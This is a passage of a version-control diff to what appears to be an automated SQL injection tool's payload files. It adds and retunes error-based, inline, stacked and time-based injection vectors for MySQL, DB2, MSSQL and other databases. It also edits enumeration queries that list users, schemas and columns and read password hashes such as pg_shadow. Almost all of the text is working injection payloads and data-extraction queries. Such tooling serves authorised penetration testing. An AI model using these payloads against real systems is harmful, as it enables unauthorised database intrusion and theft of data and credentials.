<payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>
<stype>2</stype>
@@ -135,7 +175,7 @@
<test>
<title>MySQL &gt;= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
<stype>2</stype>
<level>1</level>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
@@ -159,7 +199,7 @@
<test>
<title>MySQL &gt;= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
<stype>2</stype>
<level>1</level>
<level>2</level>
<risk>3</risk>
<clause>1,2,3,8,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
@@ -184,7 +224,7 @@
<test>
<title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
<stype>2</stype>
<level>2</level>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
@@ -208,7 +248,7 @@
<test>
<title>MySQL &gt;= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
<stype>2</stype>
<level>2</level>
<level>1</level>
<risk>3</risk>
<clause>1,2,3,8,9</clause>
<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->
@@ -282,7 +322,7 @@
<test>
<title>MySQL &gt;= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>
<stype>2</stype>
<level>2</level>
<level>3</level>
<risk>1</risk>
<clause>1,2,3,8,9</clause>
<where>1</where>
@@ -307,7 +347,7 @@
<!-- It does not work against ORDER BY or GROUP BY clause -->
<title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)</title>
<stype>2</stype>
<level>2</level>
<level>3</level>
<risk>3</risk>
<clause>1,8,9</clause>
<where>1</where>
@@ -332,7 +372,7 @@
<test>
<title>MySQL OR error-based - WHERE or HAVING clause (FLOOR)</title>
<stype>2</stype>
<level>3</level>
<level>4</level>
<risk>3</risk>
<clause>1,8,9</clause>
<where>2</where>
@@ -404,7 +444,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -425,7 +464,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -446,7 +484,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -467,7 +504,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -488,7 +524,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -509,7 +544,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -672,7 +706,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1,9</clause>
<clause>1</clause>
<where>1</where>
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -689,9 +723,9 @@
<test>
<title>Firebird OR error-based - WHERE or HAVING clause</title>
<stype>2</stype>
<level>3</level>
<level>4</level>
<risk>3</risk>
<clause>1,9</clause>
<clause>1</clause>
<where>2</where>
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -710,7 +744,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1,9</clause>
<clause>1</clause>
<where>1</where>
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -727,9 +761,9 @@
<test>
<title>MonetDB OR error-based - WHERE or HAVING clause</title>
<stype>2</stype>
<level>3</level>
<level>4</level>
<risk>3</risk>
<clause>1,9</clause>
<clause>1</clause>
<where>2</where>
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
@@ -748,7 +782,7 @@
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1,8,9</clause>
<clause>1</clause>
<where>1</where>
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request>
@@ -765,9 +799,9 @@
<test>
<title>Vertica OR error-based - WHERE or HAVING clause</title>
<stype>2</stype>
<level>3</level>
<level>4</level>
<risk>3</risk>
<clause>1,8,9</clause>
<clause>1</clause>
<where>2</where>
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>
<request>
@@ -780,6 +814,45 @@
<dbms>Vertica</dbms>
</details>
</test>
<test>
<title>IBM DB2 AND error-based - WHERE or HAVING clause</title>
<stype>2</stype>
<level>3</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
<payload>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>IBM DB2</dbms>
</details>
</test>
<test>
<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
<payload>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>IBM DB2</dbms>
</details>
</test>
<!--
TODO: if possible, add payload for SQLite, Microsoft Access,
and SAP MaxDB - no known techniques at this time
@@ -853,6 +926,26 @@
</details>
</test>
<test>
<title>MySQL &gt;= 5.6 error-based - Parameter replace (GTID_SUBSET)</title>
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
<request>
<payload>GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>
<stype>2</stype>
@@ -876,7 +969,7 @@
<test>
<title>MySQL &gt;= 5.0 error-based - Parameter replace (FLOOR)</title>
<stype>2</stype>
<level>1</level>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>3</where>
@@ -924,7 +1017,7 @@
<test>
<title>MySQL &gt;= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>
<stype>2</stype>
<level>3</level>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>3</where>
@@ -1000,7 +1093,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -1021,7 +1113,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -1062,6 +1153,25 @@
<dbms>Firebird</dbms>
</details>
</test>
<test>
<title>IBM DB2 error-based - Parameter replace</title>
<stype>2</stype>
<level>4</level>
<risk>1</risk>
<clause>1,3</clause>
<where>3</where>
<vector>RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
<payload>RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>IBM DB2</dbms>
</details>
</test>
<!-- End of error-based tests - Parameter replace -->
<!-- Error-based tests - ORDER BY, GROUP BY clause -->
@@ -1105,6 +1215,26 @@
</details>
</test>
<test>
<title>MySQL &gt;= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>2,3</clause>
<where>1</where>
<vector>,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>
<request>
<payload>,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.6</dbms_version>
</details>
</test>
<test>
<title>MySQL &gt;= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>
<stype>2</stype>
@@ -1128,7 +1258,7 @@
<test>
<title>MySQL &gt;= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>
<stype>2</stype>
<level>3</level>
<level>4</level>
<risk>1</risk>
<clause>2,3</clause>
<where>1</where>
@@ -1148,7 +1278,7 @@
<test>
<title>MySQL &gt;= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)</title>
<stype>2</stype>
<level>4</level>
<level>3</level>
<risk>1</risk>
<clause>2,3</clause>
<where>1</where>
@@ -1188,7 +1318,7 @@
<test>
<title>MySQL &gt;= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>
<stype>2</stype>
<level>2</level>
<level>3</level>
<risk>1</risk>
<clause>2,3</clause>
<where>1</where>
@@ -1205,7 +1335,6 @@
</details>
</test>
<test>
<title>PostgreSQL error-based - ORDER BY, GROUP BY clause</title>
<stype>2</stype>
@@ -1261,7 +1390,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -1289,7 +1417,7 @@
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>2,3</clause>
<clause>3</clause>
<where>1</where>
<vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>
<request>
@@ -1302,9 +1430,51 @@
<dbms>Firebird</dbms>
</details>
</test>
<test>
<title>IBM DB2 error-based - ORDER BY clause</title>
<stype>2</stype>
<level>5</level>
<risk>1</risk>
<clause>3</clause>
<where>1</where>
<vector>,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
<request>
<payload>,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>IBM DB2</dbms>
</details>
</test>
<!--
TODO: if possible, add payload for SQLite, Microsoft Access
and SAP MaxDB - no known techniques at this time
-->
<!-- End of error-based tests - ORDER BY, GROUP BY clause -->
<!-- Error-based tests - stacking -->
<test>
<title>Microsoft SQL Server/Sybase error-based - Stacking (EXEC)</title>
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1-8</clause>
<where>1</where>
<vector>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR]</vector>
<request>
<payload>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR]</payload>
<comment>--</comment>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
</details>
</test>
<!-- End of error-based tests - stacking -->
</root>

35
data/xml/payloads/inline_query.xml
View File

@@ -3,19 +3,31 @@
<root>
<!-- Inline queries tests -->
<test>
<title>MySQL inline queries</title>
<title>Generic inline queries</title>
<stype>3</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>(SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]'))</vector>
<request>
<payload>(SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]'))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
</test>
<test>
<title>MySQL inline queries</title>
<stype>3</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
<request>
<!-- These work as good as ELT(), but are longer
<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-->
<payload>(SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
<payload>(SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]'))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -28,7 +40,7 @@
<test>
<title>PostgreSQL inline queries</title>
<stype>3</stype>
<level>1</level>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
@@ -47,13 +59,13 @@
<test>
<title>Microsoft SQL Server/Sybase inline queries</title>
<stype>3</stype>
<level>1</level>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,8</clause>
<where>3</where>
<vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
<request>
<payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
<payload>(SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]')</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -61,7 +73,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -75,7 +86,7 @@
<vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
<request>
<!-- NOTE: Vertica works too without the TO_NUMBER() -->
<payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
<payload>(SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL)</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -94,7 +105,7 @@
<where>3</where>
<vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
<request>
<payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
<payload>SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]'</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>

4
data/xml/payloads/stacked_queries.xml
View File

@@ -264,7 +264,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -286,7 +285,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -307,7 +305,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -328,7 +325,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>

8
data/xml/payloads/time_blind.xml
View File

@@ -588,7 +588,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -610,7 +609,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -631,7 +629,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -652,7 +649,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -674,7 +670,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -696,7 +691,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -1638,7 +1632,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>
@@ -1936,7 +1929,6 @@
<details>
<dbms>Microsoft SQL Server</dbms>
<dbms>Sybase</dbms>
<os>Windows</os>
</details>
</test>

410
data/xml/queries.xml
View File

@@ -1,7 +1,6 @@
<?xml version="1.0" encoding="UTF-8"?>
<root>
<!-- MySQL -->
<dbms value="MySQL">
<!-- http://dba.fyicenter.com/faq/mysql/Difference-between-CHAR-and-NCHAR.html -->
<cast query="CAST(%s AS NCHAR)"/>
@@ -30,8 +29,8 @@
<is_dba query="(SELECT super_priv FROM mysql.user WHERE user='%s' LIMIT 0,1)='Y'"/>
<check_udf query="(SELECT name FROM mysql.func WHERE name='%s' LIMIT 0,1)='%s'"/>
<users>
<inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user"/>
<blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user"/>
<inband query="SELECT grantee FROM INFORMATION_SCHEMA.USER_PRIVILEGES" query2="SELECT user FROM mysql.user" query3="SELECT username FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
<blind query="SELECT DISTINCT(grantee) FROM INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT %d,1" query2="SELECT DISTINCT(user) FROM mysql.user LIMIT %d,1" query3="SELECT DISTINCT(username) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS LIMIT %d,1" count="SELECT COUNT(DISTINCT(grantee)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES" count2="SELECT COUNT(DISTINCT(user)) FROM mysql.user" count3="SELECT COUNT(DISTINCT(username)) FROM DATA_DICTIONARY.CUMULATIVE_USER_STATS"/>
</users>
<!-- https://github.com/dev-sec/mysql-baseline/issues/35 -->
<!-- https://stackoverflow.com/a/31122246 -->
@@ -45,7 +44,7 @@
</privileges>
<roles/>
<statements>
<inband query="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST"/>
<inband query="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST" query2="SELECT INFO FROM DATA_DICTIONARY.PROCESSLIST"/>
<blind query="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST ORDER BY ID LIMIT %d,1" query2="SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE ID=%d" query3="SELECT ID FROM INFORMATION_SCHEMA.PROCESSLIST LIMIT %d,1" count="SELECT COUNT(DISTINCT(INFO)) FROM INFORMATION_SCHEMA.PROCESSLIST"/>
</statements>
<dbs>
@@ -78,11 +77,11 @@
</search_column>
</dbms>
<!-- PostgreSQL -->
<dbms value="PostgreSQL">
<cast query="CAST(%s AS CHARACTER(10000))"/>
<cast query="CAST(%s AS VARCHAR(10000))"/>
<length query="LENGTH(%s)"/>
<isnull query="COALESCE(%s,' ')"/>
<!-- NOTE: PostgreSQL does not like COALESCE with different data-types (e.g. COALESCE(id,' ')) -->
<isnull query="COALESCE(%s::text,' ')"/>
<delimiter query="||"/>
<limit query="OFFSET %d LIMIT %d"/>
<limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
@@ -108,7 +107,7 @@
<check_udf query="(SELECT proname='%s' FROM pg_proc WHERE proname='%s' OFFSET 0 LIMIT 1)"/>
<users>
<inband query="SELECT usename FROM pg_user"/>
<blind query="SELECT DISTINCT(usename) FROM pg_user OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user"/>
<blind query="SELECT DISTINCT(usename) FROM pg_user ORDER BY usename OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(usename)) FROM pg_user"/>
</users>
<passwords>
<inband query="SELECT usename,passwd FROM pg_shadow" condition="usename"/>
@@ -125,35 +124,34 @@
</statements>
<dbs>
<inband query="SELECT DISTINCT(schemaname) FROM pg_tables"/>
<blind query="SELECT DISTINCT(schemaname) FROM pg_tables OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables"/>
<blind query="SELECT DISTINCT(schemaname) FROM pg_tables ORDER BY schemaname OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables"/>
</dbs>
<tables>
<inband query="SELECT schemaname,tablename FROM pg_tables" condition="schemaname"/>
<blind query="SELECT tablename FROM pg_tables WHERE schemaname='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'"/>
<blind query="SELECT tablename FROM pg_tables WHERE schemaname='%s' ORDER BY tablename OFFSET %d LIMIT 1" count="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'"/>
</tables>
<columns>
<inband query="SELECT attname,typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'" condition="attname"/>
<blind query="SELECT attname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'" query2="SELECT typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s'" count="SELECT COUNT(attname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='%s' AND nspname='%s'" condition="attname"/>
<inband query="SELECT attname,typname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s' ORDER BY attname" condition="attname"/>
<blind query="SELECT attname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s' ORDER BY attname" query2="SELECT typname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relname='%s' AND a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND attname='%s' AND nspname='%s' ORDER BY attname" count="SELECT COUNT(attname) FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND a.relname='%s' AND nspname='%s'" condition="attname"/>
</columns>
<dump_table>
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
<blind query="SELECT %s FROM %s.%s ORDER BY %s OFFSET %d LIMIT 1" count="SELECT COUNT(*) FROM %s.%s"/>
</dump_table>
<search_db>
<inband query="SELECT datname FROM pg_database WHERE %s" condition="datname"/>
<blind query="SELECT DISTINCT(datname) FROM pg_database WHERE %s" count="SELECT COUNT(DISTINCT(datname)) FROM pg_database WHERE %s" condition="datname"/>
<inband query="SELECT schemaname FROM pg_tables WHERE %s" condition="schemaname"/>
<blind query="SELECT DISTINCT(schemaname) FROM pg_tables WHERE %s" count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables WHERE %s" condition="schemaname"/>
</search_db>
<search_table>
<inband query="SELECT schemaname,tablename FROM pg_tables WHERE %s" condition="tablename" condition2="schemaname"/>
<blind query="SELECT DISTINCT(schemaname) FROM pg_tables WHERE %s" query2="SELECT tablename FROM pg_tables WHERE schemaname='%s'" count="SELECT COUNT(DISTINCT(schemaname)) FROM pg_tables WHERE %s" count2="SELECT COUNT(tablename) FROM pg_tables WHERE schemaname='%s'" condition="tablename" condition2="schemaname"/>
</search_table>
<search_column>
<inband query="SELECT nspname,relname FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND %s" condition="attname" condition2="nspname" condition3="relname"/>
<blind query="SELECT DISTINCT(nspname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND %s" query2="SELECT DISTINCT(relname) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname='%s'" count="SELECT COUNT(DISTINCT(nspname)) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND %s" count2="SELECT COUNT(DISTINCT(relname)) FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND nspname='%s'" condition="attname" condition2="nspname" condition3="relname"/>
<inband query="SELECT nspname,relname FROM pg_attribute b JOIN pg_class a ON a.oid=b.attrelid JOIN pg_type c ON c.oid=b.atttypid JOIN pg_namespace d ON a.relnamespace=d.oid WHERE b.attnum>0 AND %s" condition="attname" condition2="nspname" condition3="relname"/>
